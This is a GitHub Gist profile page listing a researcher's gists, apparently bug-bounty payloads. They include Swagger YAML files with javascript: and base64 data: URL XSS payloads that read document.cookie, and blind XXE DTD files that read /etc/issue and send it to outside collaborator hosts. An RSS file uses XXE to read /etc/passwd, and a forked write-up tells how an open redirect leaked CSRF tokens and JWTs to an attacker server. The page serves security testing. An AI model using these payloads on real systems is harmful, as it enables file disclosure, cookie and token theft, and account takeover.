Skip to content

Instantly share code, notes, and snippets.

View pranav1hivarekar's full-sized avatar

pranav1hivarekar

11 followers · 35 following
View GitHub Profile
@pranav1hivarekar
pranav1hivarekar / swaggerxss.yaml
Last active October 18, 2022 08:48
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
info:
version: "0.0.1"
title: Example Title
description: Click here for <a href="https://cobalt.io">Information</a>
@pranav1hivarekar
pranav1hivarekar / xhr.html
Last active April 2, 2020 16:08
<html>
<body>
<h1>The XMLHttpRequest Object</h1>
<button type="button" onclick="loadDoc()">Request data</button>
@pranav1hivarekar
pranav1hivarekar / test1.dtd
Last active April 15, 2020 06:05
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://7emscc550ck73ff2k9amwlwuwl2bq0.burpcollaborator.net?%file;'>">
%p2;
@pranav1hivarekar
pranav1hivarekar / test.dtd
Created July 12, 2019 14:56
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://pingb.in/p/2ebe9045521fdb0eb23fb222ec64?%file;'>">
%p2;
@pranav1hivarekar
pranav1hivarekar / blindtest.dtd
Created July 12, 2019 07:27
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://requestbin.net/r/r81iypr8?%file;'>">
%p2;
@pranav1hivarekar
pranav1hivarekar / test1.yaml
Last active May 25, 2019 04:38
swagger: "2.0"
info:
title: "Swagger Sample App"
description: "Please to click Terms of service"
termsOfService: "data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"
contact:
name: "API Support"
url: "java%0Ascript:%0Aalert(document.cookie);//"
email: "javascript:%0Aalert(document.cookie)"
version: "1.0.1"
@pranav1hivarekar
pranav1hivarekar / csrf_jwt_redirect_leak.md
Created May 17, 2019 04:11 — forked from stefanocoding/csrf_jwt_redirect_leak.md

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user 
    GET /verify/VALUE HTTP/1.1
Host: example.com
@pranav1hivarekar
pranav1hivarekar / test.html
Last active December 23, 2018 13:54
<title>test</title>
@pranav1hivarekar
pranav1hivarekar / rss.xml
Last active June 4, 2018 13:03
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<channel>
<atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/>
<title>Data Skeptic</title>
<pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate>
<lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate>
<generator>Libsyn WebEngine 2.0</generator>
<link>http://dataskeptic.com</link>
<language>en</language>
@pranav1hivarekar
pranav1hivarekar / something.xml
Created June 1, 2018 16:33
xxe
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>&xxe;</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>